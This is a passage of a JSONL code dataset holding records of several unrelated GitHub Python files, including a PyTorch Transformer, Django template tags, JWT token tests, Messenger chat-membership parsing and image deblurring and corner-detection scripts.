nn.Linear(d_model, d_model)\n\n    def attention(self, q, k, v, d_k, mask=None, dropout=None):\n        \n        scores = torch.matmul(q, k.transpose(-2, -1)) /  math.sqrt(d_k)\n        \n        if mask is not None:\n            mask = mask.unsqueeze(1)\n            scores = scores.masked_fill(mask == 0, -1e9)\n        \n        scores = F.softmax(scores, dim=-1)\n        \n        if dropout is not None:\n            scores = dropout(scores)\n        \n        output = torch.matmul(scores, v)\n        return output\n    \n    def forward(self, q, k, v, mask=None):\n        \n        bs = q.size(0)\n        \n        # perform linear operation and split into N heads\n        k = self.k_linear(k).view(bs, -1, self.h, self.d_k)\n        q = self.q_linear(q).view(bs, -1, self.h, self.d_k)\n        v = self.v_linear(v).view(bs, -1, self.h, self.d_k)\n        \n        # transpose to get dimensions bs * N * sl * d_model\n        k = k.transpose(1,2)\n        q = q.transpose(1,2)\n        v = v.transpose(1,2)\n        \n        # calculate attention using function we will define next\n        scores = self.attention(q, k, v, self.d_k, mask, self.dropout)\n        # concatenate heads and put through final linear layer\n        concat = scores.transpose(1,2).contiguous()\\\n        .view(bs, -1, self.d_model)\n        output = self.out(concat)\n    \n        return output\n\nclass FeedForward(nn.Module):\n    def __init__(self, d_model, d_ff=2048, dropout = 0.1):\n        super().__init__() \n    \n        # We set d_ff as a default to 2048\n        self.linear_1 = nn.Linear(d_model, d_ff)\n        self.dropout = nn.Dropout(dropout)\n        self.linear_2 = nn.Linear(d_ff, d_model)\n    \n    def forward(self, x):\n        x = self.dropout(F.relu(self.linear_1(x)))\n        x = self.linear_2(x)\n        return x\n\nclass Embedder(nn.Module):\n    def __init__(self, vocab_size, d_model):\n        super().__init__()\n        self.d_model = d_model\n        self.embed = nn.Embedding(vocab_size, d_model)\n    def forward(self, x):\n        return self.embed(x)\n\nclass PositionalEncoder(nn.Module):\n    def __init__(self, d_model, max_seq_len = 200, dropout = 0.1):\n        super().__init__()\n        self.d_model = d_model\n        self.dropout = nn.Dropout(dropout)\n        # create constant 'pe' matrix with values dependant on \n        # pos and i\n        pe = torch.zeros(max_seq_len, d_model)\n        for pos in range(max_seq_len):\n            for i in range(0, d_model, 2):\n                pe[pos, i] = \\\n                math.sin(pos / (10000 ** ((2 * i)/d_model)))\n                pe[pos, i + 1] = \\\n                math.cos(pos / (10000 ** ((2 * (i + 1))/d_model)))\n        pe = pe.unsqueeze(0)\n        self.register_buffer('pe', pe)\n \n    \n    def forward(self, x):\n        # make embeddings relatively larger\n        x = x * math.sqrt(self.d_model)\n        #add constant to embedding\n        seq_len = x.size(1)\n        pe = Variable(self.pe[:,:seq_len], requires_grad=False)\n        if x.is_cuda:\n            pe.cuda()\n        x = x + pe\n        return self.dropout(x)\n\nclass EncoderLayer(nn.Module):\n    def __init__(self, d_model, heads, dropout=0.1):\n        super().__init__()\n        self.norm_1 = nn.LayerNorm(d_model)\n        self.norm_2 = nn.LayerNorm(d_model)\n        self.attn = MultiHeadAttention(heads, d_model, dropout=dropout)\n        self.ff = FeedForward(d_model, dropout=dropout)\n        self.dropout_1 = nn.Dropout(dropout)\n        self.dropout_2 = nn.Dropout(dropout)\n        \n    def forward(self, x, mask):\n        x2 = self.norm_1(x)\n        x = x + self.dropout_1(self.attn(x2,x2,x2,mask))\n        x2 = self.norm_2(x)\n        x = x + self.dropout_2(self.ff(x2))\n        return x\n    \n# build a decoder layer with two multi-head attention layers and\n# one feed-forward layer\nclass DecoderLayer(nn.Module):\n    def __init__(self, d_model, heads, dropout=0.1):\n        super().__init__()\n        self.norm_1 = nn.LayerNorm(d_model)\n        self.norm_2 = nn.LayerNorm(d_model)\n        self.norm_3 = nn.LayerNorm(d_model)\n        \n        self.dropout_1 = nn.Dropout(dropout)\n        self.dropout_2 = nn.Dropout(dropout)\n        self.dropout_3 = nn.Dropout(dropout)\n        \n        self.attn_1 = MultiHeadAttention(heads, d_model, dropout=dropout)\n        self.attn_2 = MultiHeadAttention(heads, d_model, dropout=dropout)\n        self.ff = FeedForward(d_model, dropout=dropout)\n\n    def forward(self, x, e_outputs, src_mask, trg_mask):\n        x2 = self.norm_1(x)\n        x = x + self.dropout_1(self.attn_1(x2, x2, x2, trg_mask))\n        x2 = self.norm_2(x)\n        x = x + self.dropout_2(self.attn_2(x2, e_outputs, e_outputs, src_mask))\n        x2 = self.norm_3(x)\n        x = x + self.dropout_3(self.ff(x2))\n        return x\n\ndef get_clones(module, N):\n    return nn.ModuleList([copy.deepcopy(module) for i in range(N)])\n\nclass Encoder(nn.Module):\n    def __init__(self, vocab_size, d_model, N, heads, dropout):\n        super().__init__()\n        self.N = N\n        self.embed = Embedder(vocab_size, d_model)\n        self.pe = PositionalEncoder(d_model, dropout=dropout)\n        self.layers = get_clones(EncoderLayer(d_model, heads, dropout), N)\n        self.norm = nn.LayerNorm(d_model)  # nn.LayerNorm stands in for the undefined Norm class\n    def forward(self, src, mask):\n        x = self.embed(src)\n        x = self.pe(x)\n        for i in range(self.N):\n            x = self.layers[i](x, mask)\n        return self.norm(x)\n    \nclass Decoder(nn.Module):\n    def __init__(self, vocab_size, d_model, N, heads, dropout):\n        super().__init__()\n        self.N = N\n        self.embed = Embedder(vocab_size, d_model)\n        self.pe = PositionalEncoder(d_model, dropout=dropout)\n        self.layers = get_clones(DecoderLayer(d_model, heads, dropout), N)\n        self.norm = nn.LayerNorm(d_model)  # nn.LayerNorm stands in for the undefined Norm class\n    def forward(self, trg, e_outputs, src_mask, trg_mask):\n        x = self.embed(trg)\n        x = self.pe(x)\n        for i in range(self.N):\n            x = self.layers[i](x, e_outputs, src_mask, trg_mask)\n        return self.norm(x)\n\nclass Transformer(nn.Module):\n    def __init__(self, src_vocab, trg_vocab, d_model, N, heads, dropout):\n        super().__init__()\n        self.encoder = Encoder(src_vocab, d_model, N, heads, dropout)\n        self.decoder = Decoder(trg_vocab, d_model, N, heads, dropout)\n        self.out = nn.Linear(d_model, trg_vocab)\n    def forward(self, src, trg, src_mask, trg_mask):\n        e_outputs = self.encoder(src, src_mask)\n        #print(\"DECODER\")\n        d_output = self.decoder(trg, e_outputs, src_mask, trg_mask)\n        output = self.out(d_output)\n        return output\n\ndef get_model(opt, src_vocab, trg_vocab):\n    \n    assert opt.d_model % opt.heads == 0\n    assert opt.dropout < 1\n\n    model = Transformer(src_vocab, trg_vocab, opt.d_model, opt.n_layers, opt.heads, opt.dropout)\n    model.to(opt.device)\n    \n    if opt.load_weights is not None:\n        print(\"loading pretrained weights...\")\n        model.load_state_dict(torch.load(f'{opt.load_weights}/model_weights'))\n    else:\n        for p in model.parameters():\n            if p.dim() > 1:\n                nn.init.xavier_uniform_(p) \n    \n    return model\n\ndef train():\n    # NOTE: illustrative sketch only; assumes opt/vocab args for get_model,\n    # train_dataloader, get_loss and label are defined elsewhere\n    model = get_model()\n\n    optimizer = optim.SGD(model.parameters(), lr=0.001)\n\n    for data in train_dataloader:\n        output = model.forward(data)\n        loss = get_loss(output, label)\n\n        optimizer.zero_grad()\n        loss.backward()\n        optimizer.step()\n","repo_name":"sunzhy3/exercise","sub_path":"code/transformer.py","file_name":"transformer.py","file_ext":"py","file_size_in_byte":8574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"73737155074","text":"from django import template\n\n\nregister = template.Library()\n\n\n@register.simple_tag\ndef is_accessible_by(record, user):\n    try:\n        return record.is_accessible_by(user)\n    except (TypeError, AttributeError, IndexError):\n        return False\n\n\n@register.filter\ndef check_chart_access(record, user):\n    access = True\n    for query in record.queries.all():\n        if not query.is_accessible_by(user):\n            access = False\n    return access\n\n\n@register.simple_tag\ndef get_extra_source(record, data):\n    if not data:\n        return \"\"\n    if record.id in data:\n        return data[record.id]\n    return \"\"\n","repo_name":"Linaro/lite-lava","sub_path":"lava_results_app/templatetags/results_accessibility_tags.py","file_name":"results_accessibility_tags.py","file_ext":"py","file_size_in_byte":615,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"}
+{"seq_id":"23442122321","text":"import collections\ncompare = lambda x, y: collections.Counter(x) == collections.Counter(y)\n\nfile_in = open(\"B.in\", \"r\")\nfile_out = open(\"B-small.out\", \"w\")\n\ndef output (string):\n\tfile_out.write(string + \"\\n\")\n\tprint(string)\n\ncase = 1\nread = 0\nA = 0\nB = 0\nK = 0\nfor number, line in enumerate(list(file_in)):\n\tif number == 0:\n\t\tcontinue\n\tA, B, K = line[:-1].split()\n\tchnce = 0\n\tfor a in range(int(A)):\n\t\tfor b in range(int(B)):\n\t\t\tif a & b < int(K):\n\t\t\t\tchnce += 1\n\toutput(\"Case #{}: \".format(case) + str(chnce))\n\tcase += 1\n\nfile_in.close()\nfile_out.close()","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_143/436.py","file_name":"436.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"8073732684","text":"# author: Huy.Nguyen\n# institute: Hanoi University of Science and Technology\n# file name: _task_gbpusd_logger.py\n# project name: LogProducer\n# date: 25/11/2020\n\nfrom logger._logger import Logger\nfrom logger._record import TaskGbpUsdRecord\nfrom iostream import TaskGbpUsdLoader\nfrom config import LoggerConfig\n\n\nclass TaskGbpUsdLogger(Logger):\n\n    __instance__ = None\n\n    def __init__(self, config: LoggerConfig):\n        if TaskGbpUsdLogger.__instance__ is None:\n            super().__init__()\n            self.__config = config\n            self._loader = TaskGbpUsdLoader()\n            self._recorder = TaskGbpUsdRecord()\n            TaskGbpUsdLogger.__instance__ = self\n        else:\n            raise Exception(\"Cannot create another instance of {}\".format(self.__class__))\n\n    @classmethod\n    def get_instance(cls, config: LoggerConfig):\n        if cls.__instance__ is None:\n            TaskGbpUsdLogger(config)\n        return cls.__instance__\n\n    def get_name(self):\n        return \"GBPUSD LOGGER\"\n","repo_name":"nguyenvanhuybk99/ForexSpark","sub_path":"LogProducer/logger/_task_gbpusd_logger.py","file_name":"_task_gbpusd_logger.py","file_ext":"py","file_size_in_byte":1007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"30501322545","text":"# [[1, 2], [5, 6]]\n# [[3, 4], [1, 2]]\n# [[4, 6], [6, 8]]\n\ndef a_b(a, b):\n    my_list = []\n    if len(a) == len(b):\n        for i, j in zip(a, b):\n            list1 = []\n            for x, y in zip(i, j):\n                z = x + y\n                list1.append(z)\n            print(list1)\n            my_list.append(list1)\n    else:\n        raise ValueError('Lists are not of equal length')\n    return my_list\n\n\nmy = a_b([[1, 2], [5, 6], [7, 8]], [[3, 4], [1, 2], [2, 1]])\nprint(my)\n","repo_name":"stepanskyvlad/Learning-Python","sub_path":"Data_Structures/Lists/interview.py","file_name":"interview.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"40233438578","text":"# Tests for code in squarepants/src/main/python/squarepants/plugins/staging_build/tasks/staging_build.py\n#\n# Run with:\n#   ./pants test squarepants/src/test/python/squarepants_test/plugins:staging_build\n\nfrom pants_test.tasks.task_test_base import TaskTestBase\n\nfrom squarepants.plugins.sake_wire_codegen.targets.sake_wire_library import SakeWireLibrary\nfrom squarepants.plugins.sake_wire_codegen.targets.wire_proto_path import WireProtoPath\nfrom squarepants.plugins.sake_wire_codegen.tasks.sake_wire_codegen import SakeWireCodegen\n\n\nclass SakeWireCodegenTest(TaskTestBase):\n\n  @classmethod\n  def task_type(cls):\n    return SakeWireCodegen\n\n\n  def test_wire_proto_path(self):\n    foo_proto_path = self.make_target('foo/src/main/proto:wire-proto', WireProtoPath,\n                                      sources=[\n                                        'foo/src/main/proto/squareup/foo/foo.proto'\n                                      ])\n    bar_proto_path = self.make_target('bar/src/main/proto:wire-proto', WireProtoPath,\n                                      sources=[\n                                        'bar/src/main/proto/squareup/bar/bar.proto'\n                                      ],\n                                      dependencies=[\n                                        foo_proto_path,\n                                      ])\n    sake_wire_library_target = self.make_target('baz:wire-library', SakeWireLibrary,\n                                                sources=[\n                                                  'baz/src/main/proto/squareup/baz/baz.proto'\n                                                ],\n                                                dependencies=[bar_proto_path])\n\n    task = 
self.create_task(self.context(target_roots=[sake_wire_library_target]))\n\n    self.assertEqual(['foo/src/main/proto', 'baz', 'bar/src/main/proto'],\n                      task._calculate_proto_paths(sake_wire_library_target))\n\n","repo_name":"ericzundel/mvn2pants","sub_path":"test/python/squarepants_test/plugins/test_sake_wire_codegen.py","file_name":"test_sake_wire_codegen.py","file_ext":"py","file_size_in_byte":1947,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"61"}
+{"seq_id":"15719780487","text":"from django.urls import path\nfrom . import views\nurlpatterns = [\n    path('Bodegas', views.Bodegas_Consultas, name=\"Bodegas_Consulta\"),\n    path('Contactos/', views.Contactos_Consultas, name=\"Contactos_Consulta\"),\n    path('Facturas/', views.Facturas_Consulta, name=\"Facturas_Consulta\"),\n    path('Movimiento/', views.Movimiento_Consulta, name=\"Movimiento_Consulta\"),\n    path('Producto_Consulta', views.Producto_Consulta, name=\"Producto_Consulta\"),\n    path('Reporte_Inventario', views.Reporte_Inventario, name=\"Reporte_Inventario\"),\n    path('Usuarios', views.Usuario_Consulta, name=\"Usuarios_Consulta\")\n]","repo_name":"GBValdez/Pinturitas","sub_path":"Consultas/url.py","file_name":"url.py","file_ext":"py","file_size_in_byte":615,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"74995542593","text":"from datetime import datetime\n\nimport pytest\n\nfrom everycache_api.auth.helpers import (\n    create_jwt_payload,\n    create_user_access_token,\n    create_user_refresh_token,\n    is_token_revoked,\n    revoke_all_user_tokens,\n    revoke_token,\n    save_encoded_token,\n)\nfrom everycache_api.models import Token\nfrom everycache_api.tests.factories.token_factory import TokenFactory\nfrom everycache_api.tests.factories.user_factory import AdminFactory, UserFactory\n\nTOKEN_TYPES = (\"access\", \"refresh\")\n\n\n@pytest.mark.parametrize(\"factory\", (UserFactory, AdminFactory))\ndef test_create_jwt_payload(factory):\n    user = factory()\n\n    assert create_jwt_payload(user) == {\"identity\": user.ext_id, \"additional_claims\": {\n        \"role\": user.role.name}}\n\n\ndef test_create_user_access_token(mocker):\n    user = UserFactory()\n\n    mock = mocker.patch(\"everycache_api.auth.helpers.create_access_token\")\n    create_user_access_token(user)\n\n    mock.assert_called_once()\n\n\ndef test_create_user_refresh_token(mocker):\n    user = UserFactory()\n\n    mock = mocker.patch(\"everycache_api.auth.helpers.create_refresh_token\")\n    create_user_refresh_token(user)\n\n    mock.assert_called_once()\n\n\n@pytest.mark.parametrize(\"token_type\", TOKEN_TYPES)\ndef test_save_encoded_token(token_type, mocker):\n    user = UserFactory()\n    decoded_token = {\n        \"jti\": \"test_jti\",\n        \"exp\": datetime.now().timestamp(),\n        \"type\": token_type,\n        \"sub\": user.ext_id\n    }\n    mocker.patch(\"everycache_api.auth.helpers.decode_token\",\n                 return_value=decoded_token)\n\n    token = create_user_access_token(user)\n    result = save_encoded_token(token)\n    assert result\n\n    assert Token.query.count() == 1\n    token = Token.query.first()\n\n    assert token.jti == decoded_token[\"jti\"]\n    assert token.token_type == decoded_token[\"type\"]\n    assert token.user_id == user.id_\n    assert token.expires == datetime.fromtimestamp(decoded_token[\"exp\"])\n    assert token.revoked is False\n\n\n@pytest.mark.parametrize(\"revoked\", (True, False))\n@pytest.mark.parametrize(\"token_type\", TOKEN_TYPES)\ndef test_is_token_revoked(revoked, token_type):\n    token = TokenFactory(revoked=revoked, token_type=token_type)\n    sub = 
token.user.ext_id\n    res = is_token_revoked({\"jti\": token.jti, \"type\": token_type, \"sub\": sub})\n    assert res == revoked\n\n\ndef test_is_token_revoked_not_found():\n    with pytest.raises(Exception):\n        is_token_revoked({\"jti\": \"t_jti\", \"type\": \"t_tt\", \"sub\": \"t_sub\"})\n\n\n@pytest.mark.parametrize(\"token_type\", TOKEN_TYPES)\ndef test_revoke_token(token_type):\n    token = TokenFactory(token_type=token_type)\n    assert token.revoked is False\n\n    revoke_token(\n        {\"jti\": token.jti, \"sub\": token.user.ext_id, \"type\": token_type})\n\n    assert token.revoked is True\n\n\ndef test_revoke_token_no_token():\n    with pytest.raises(Exception):\n        revoke_token({\"jti\": \"jti\", \"sub\": \"ext_id\", \"type\": \"token_type\"})\n\n\n@pytest.mark.parametrize(\"token_type\", TOKEN_TYPES)\ndef test_revoke_one_token(token_type):\n    token_1 = TokenFactory(token_type=token_type)\n    token_2 = TokenFactory(user=token_1.user, token_type=token_type)\n\n    assert not token_1.revoked\n    assert not token_2.revoked\n\n    revoke_token(\n        {\"jti\": token_2.jti, \"sub\": token_2.user.ext_id, \"type\": token_type})\n\n    assert not token_1.revoked\n    assert token_2.revoked\n\n\ndef test_revoke_all_user_tokens():\n    user_1 = UserFactory()\n    token_1 = TokenFactory(user=user_1)\n    token_2 = TokenFactory(user=user_1)\n\n    assert not any((token_1.revoked, token_2.revoked))\n\n    revoke_all_user_tokens(user_1)\n\n    assert all((token_1.revoked, token_2.revoked))\n\n\ndef test_revoke_all_user_tokens_other_users():\n    user_1 = UserFactory()\n    user_2 = UserFactory()\n    token_1 = TokenFactory(user=user_1)\n    token_2 = TokenFactory(user=user_1)\n    token_3 = TokenFactory(user=user_2)\n\n    assert not any((token_1.revoked, token_2.revoked, token_3.revoked))\n\n    revoke_all_user_tokens(user_1)\n\n    assert all((token_1.revoked, token_2.revoked))\n    assert not token_3.revoked\n\n\ndef test_revoke_all_user_tokens_none_found():\n    user_1 = UserFactory()\n    assert revoke_all_user_tokens(user_1)\n","repo_name":"everycache-group/everycache-app","sub_path":"api/everycache_api/tests/auth/test_auth_helpers.py","file_name":"test_auth_helpers.py","file_ext":"py","file_size_in_byte":4169,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"29820609849","text":"import datetime\nimport re\n\nfrom DataBuilder.ChatParsing import ChatHistory\nfrom DataBuilder.MessageParsing import Message\nfrom DataBuilder.ParticipantParsing import Participant\n\n\nclass MembershipRecord(object):\n\n    def __init__(self, message: Message,\n                 timestamp: datetime.datetime,\n                 record_type: str, actor: Participant or None,\n                 target: Participant, estimate: bool = False) -> None:\n        self.OriginalMessage = message\n        self.timestamp = timestamp\n        self.RecordType = record_type\n        self.Actor = actor\n        self.Target = target\n        self.Estimate = estimate\n\n    def __str__(self):\n        text = \"\\nActor: \" + self.Actor.Name + \\\n              \"\\nDate: \" + self.timestamp.__str__() + \\\n              \"\\nRecord Type: \" + self.RecordType + \\\n              \"\\nEstimate: \" + self.Estimate.__str__()\n        return text\n\n\ndef person__added_or_removed__reconstruction(chat_history: ChatHistory) -> None:\n    \"\"\"\n    Reconstruct the membership history (added/removed/left) from chat messages.\n\n    :param chat_history:\n    :return:\n    \"\"\"\n\n    message_type_switch = {\n        \"ADDED\": _process_added_message,\n        \"REMOVED\": _process_removed_message,\n        \"LEFT\": _process_left_message,\n        \"NONE\": None\n    }\n\n    ''' Chat Messages for Ease of Calling '''\n    chat_messages = chat_history.ChatMessages\n\n    potential_messages = []\n\n    for m in chat_messages:\n        member = _check_if_member_message(m, 
chat_history)\n\n if member:\n potential_type = _check_potential_type(m)\n potential_messages.append((m, potential_type))\n\n for m, t in potential_messages: # Construct the Membership History from Messages Sent to Chat\n message_type_switch[t](m, chat_history)\n\n _construct_original_membership(chat_history)\n\n\ndef _construct_original_membership(chat_history: ChatHistory):\n people = chat_history.ChatParticipants\n chat_history.ChatMessages.sort(key=lambda x: x.timestamp, reverse=False)\n messages = chat_history.ChatMessages\n\n for p in people:\n\n people[p].MemberShipRecords.sort(key=lambda x: x.timestamp, reverse=False)\n persons_records = people[p].MemberShipRecords\n\n if (len(persons_records) == 0 and len(people[p].Messages) > 0) or \\\n persons_records[0].RecordType == (\"REMOVED\" or \"LEFT\"):\n people[p].Messages.sort(key=lambda x: x.timestamp)\n first_message = people[p].Messages[0]\n record = MembershipRecord(first_message, first_message.timestamp, \"ADDED\", None, people[p], True)\n people[p].MemberShipRecords.append(record)\n people[p].Messages.sort(key=lambda x: x.timestamp)\n elif len(persons_records) == 0 and len(people[p].Messages) == 0:\n first_message = messages[0]\n record = MembershipRecord(first_message, first_message.timestamp, \"ADDED\", None, people[p], True)\n people[p].MemberShipRecords.append(record)\n\n\ndef _check_if_member_message(message: Message, chat_history: ChatHistory) -> bool:\n ''' Compile Regex for Finding the Right Messages'''\n correct_format_regex = \\\n re.compile(\n '.* (?:added|removed|left).*.') # Check if Potential Message is of the acceptable format to be an added message\n\n correct_format = correct_format_regex.match(message.Content.__str__())\n\n if correct_format \\\n and not _check_if_poll(message.Content.__str__()) \\\n and not _check_if_plan(message.Content.__str__()) \\\n and _nick_matches_sender(message, chat_history):\n return True\n\n return False\n\n\ndef _check_if_poll(message: str):\n removed_vote_regex = re.compile('.* removed vote for .* in the poll: .*')\n\n if removed_vote_regex.match(message):\n return True\n else:\n return False\n\n\ndef _check_if_plan(message: str):\n removed_plan_regex = re.compile('.* removed the plan location.')\n\n if removed_plan_regex.match(message):\n return True\n else:\n return False\n\n\ndef _check_potential_type(message: Message) -> str:\n if \"added\" in message.Content.__str__():\n return \"ADDED\"\n elif \"removed\" in message.Content.__str__():\n return \"REMOVED\"\n elif \"left\" in message.Content.__str__():\n return \"LEFT\"\n else:\n return \"NONE\"\n\n\ndef _process_removed_message(message: Message, chat_history: ChatHistory):\n get_name_regex = re.compile('(?<=removed ).*(?= from the group)')\n\n match = get_name_regex.search(message.Content.__str__()).group()\n\n chat_history.ChatParticipants[match].MemberShipRecords.append(\n MembershipRecord(message,\n message.timestamp,\n \"REMOVED\",\n chat_history.ChatParticipants[message.Sender],\n chat_history.ChatParticipants[match]))\n\n\ndef _process_added_message(message: Message, chat_history):\n names_added_regex = re.compile('(?<=added ).*(?=.)')\n\n names = names_added_regex.search(message.Content.__str__()).group()\n\n if \" and \" in names:\n separate_names_regex = re.compile('(.*)(?= and )|(?<= and )(.*)')\n separate_names = separate_names_regex.findall(names)\n\n first_person = separate_names[0][0]\n second_person = separate_names[2][1]\n\n chat_history.ChatParticipants[first_person].MemberShipRecords.append(\n 
MembershipRecord(message,\n                             message.timestamp,\n                             \"ADDED\",\n                             chat_history.ChatParticipants[message.Sender],\n                             chat_history.ChatParticipants[first_person]))\n\n        check_actual_person_regex = re.compile('[0-9]* others')\n        match = check_actual_person_regex.search(second_person)\n\n        if not match:\n            chat_history.ChatParticipants[second_person].MemberShipRecords.append(\n                MembershipRecord(message,\n                                 message.timestamp,\n                                 \"ADDED\",\n                                 chat_history.ChatParticipants[message.Sender],\n                                 chat_history.ChatParticipants[second_person]))\n\n    else:\n        chat_history.ChatParticipants[names].MemberShipRecords.append(\n            MembershipRecord(message,\n                             message.timestamp,\n                             \"ADDED\",\n                             chat_history.ChatParticipants[message.Sender],\n                             chat_history.ChatParticipants[names]))\n\n\ndef _process_left_message(message: Message, chat_history):\n    chat_history.ChatParticipants[message.Sender].MemberShipRecords.append(\n        MembershipRecord(message,\n                         message.timestamp,\n                         \"LEFT\",\n                         chat_history.ChatParticipants[message.Sender],\n                         chat_history.ChatParticipants[message.Sender]))\n\n\ndef _nick_actor(message: str) -> str:\n    potential_adder_regex = \\\n        re.compile(\"((.*)(?=(?: added| removed| left).*))\")  # Get the Nickname of the potential adder\n    nick = potential_adder_regex.match(message).group()\n    return nick\n\n\ndef _nick_matches_sender(message, chat_history):\n    actor_nick = _nick_actor(message.Content.__str__())\n\n    if actor_nick == \"You\":\n        actor_nick = chat_history.DataOwner\n\n    if actor_nick in chat_history.ChatParticipants[message.Sender].Nicknames or actor_nick == message.Sender:\n        return True\n\n    return False\n","repo_name":"ben-dow/MessengerAnalysis","sub_path":"Facebook Messenger Analysis/DataBuilder/MemberShipParsing.py","file_name":"MemberShipParsing.py","file_ext":"py","file_size_in_byte":7430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"8376680419","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time    : 2018/12/24 10:18 PM\n# @Author  : Chen Junhua\n# @File    : main.py\n# @Software: PyCharm\n\n# from .service import store_product_link, wait_for_login\n# from .goods import Good\nfrom selenium import webdriver\n# from json import dump, load\nfrom app.models import Session\nfrom app.models.databases import Brands, Goods\n\nchrome_opt = webdriver.ChromeOptions()\n# chrome_opt.add_argument(\"--headless\")\nbrowser = webdriver.Chrome(chrome_options=chrome_opt)\nbrowser.implicitly_wait(30)\nsession = Session()\n\ndef run():\n    while True:\n        brand_name = input('++++++Please enter a brand name: ')\n        if brand_name:\n            break\n    new_brand = Brands(name=brand_name, state=0)\n    session.add(new_brand)\n    session.commit()\n    brand_id = Brands.brand_id(brand_name, session)\n    good = Goods(\n        brand_id = brand_id,\n        taobao_name='',\n        taobao_link=''\n    )\n\n\nif __name__ == '__main__':\n    run()","repo_name":"chjh0612/pet_planet","sub_path":"srcipt/taobao/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":972,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"37861722062","text":"import math\n\nimport cv2\nimport cv2 as cv\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\n# Generate the motion-blur kernel\ndef get_motion_dsf(image_size, motion_dis, motion_angle):\n    PSF = np.zeros(image_size)  # point spread function\n    x_center = (image_size[0] - 1) / 2\n    y_center = (image_size[1] - 1) / 2\n\n    sin_val = math.sin(motion_angle * math.pi / 180)\n    cos_val = math.cos(motion_angle * math.pi / 180)\n\n    # Set motion_dis points along the given angle to 1\n    for i in range(motion_dis):\n        x_offset = round(sin_val * i)\n        y_offset = round(cos_val * i)\n        PSF[int(x_center - x_offset), int(y_center + y_offset)] = 1\n\n    return np.fft.fft2(PSF / PSF.sum())\n\n# Wiener filtering\ndef wiener(f, PSF, K=0.1):  # Wiener filter, K=0.1\n    input_fft = np.fft.fft2(f)\n    PSF_fft_1 = np.conj(PSF) / (np.abs(PSF) ** 2 + K)\n    result = np.fft.ifftshift(np.fft.ifft2(input_fft * PSF_fft_1))\n    return result.real\n\n\ndef show(f, s, a, b, c):\n    plt.subplot(a, b, c)\n    plt.imshow(f, \"gray\")\n    plt.axis('on')\n    plt.title(s)\n\n\ndef main():\n    img1 = cv2.imread('blur.png', 0)\n    img = img1[100:551, 500:951]\n    # img = cv.medianBlur(img, 2)\n    PSF = get_motion_dsf(img.shape, 4, -0.1)\n    plt.figure()\n    show(img, \"f\", 1, 2, 1)\n    show(wiener(img, PSF), \"restoreImage\", 1, 2, 2)\n    plt.show()\n\n\nif __name__ == '__main__':\n    main()\n\n\n","repo_name":"PengQ0203/Torch","sub_path":"CV/deblur/weina.py","file_name":"weina.py","file_ext":"py","file_size_in_byte":1356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"4332260107","text":"from scipy import signal as sig\nfrom scipy import ndimage as ndi\nimport numpy as np\nfrom skimage.io import imread\nfrom skimage.color import rgb2gray\nfrom skimage.feature import corner_peaks\nimport matplotlib.pylab as plt\nfrom math import floor\n\nimg = imread('./start.jpeg')\nimggray = rgb2gray(img)\n\ndef gradient_x(imggray):\n    ##Sobel operator kernels.\n    kernel_x = np.array([[-1, 0, 1],[-2, 0, 2],[-1, 0, 1]])\n    return sig.convolve2d(imggray, kernel_x, mode='same')\ndef gradient_y(imggray):\n    kernel_y = np.array([[1, 2, 1], [0, 0, 0], [-1, -2, -1]])\n    return sig.convolve2d(imggray, kernel_y, mode='same')\n\nI_x = gradient_x(imggray)\nI_y = gradient_y(imggray)\n\nIxx = ndi.gaussian_filter(I_x**2, sigma=1)\nIxy = ndi.gaussian_filter(I_y*I_x, sigma=1)\nIyy = ndi.gaussian_filter(I_y**2, sigma=1)\n\nk = 0.05\n\n# determinant\ndetA = Ixx * Iyy - Ixy ** 2\n# trace\ntraceA = Ixx + Iyy\n \nharris_response = detA - k * traceA ** 2\n\nwindow_size = 3\n\noffset = floor(window_size/2)\nheight , width =Ixx.shape\n\nfor y in range(offset, height-offset):\n    for x in range(offset, width-offset):\n        Sxx = np.sum(Ixx[y-offset:y+1+offset, x-offset:x+1+offset])\n        Syy = np.sum(Iyy[y-offset:y+1+offset, x-offset:x+1+offset])\n        Sxy = np.sum(Ixy[y-offset:y+1+offset, x-offset:x+1+offset])\n\n#Find determinant and trace, use to get corner response\ndet = (Sxx * Syy) - (Sxy**2)\ntrace = Sxx + Syy\nr = det - k*(trace**2)\n\nimg_copy_for_corners = np.copy(img)\nimg_copy_for_edges = np.copy(img)\n\nfor rowindex, response in enumerate(harris_response):\n    for colindex, r in enumerate(response):\n        if r > 0:\n            # this is a corner\n            img_copy_for_corners[rowindex, colindex] = [255,0,0]\n        elif r < 0:\n            # this is an edge\n            img_copy_for_edges[rowindex, colindex] = [0,255,0]\n\ncorners = corner_peaks(harris_response)\nfig, ax = plt.subplots()\nax.imshow(img, interpolation='nearest', cmap=plt.cm.gray)\nax.plot(corners[:, 1], corners[:, 0], '.r', markersize=3)\nplt.show()\n","repo_name":"Typelias/AR_Assignments","sub_path":"Assignment3/OLD2.py","file_name":"OLD2.py","file_ext":"py","file_size_in_byte":2004,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
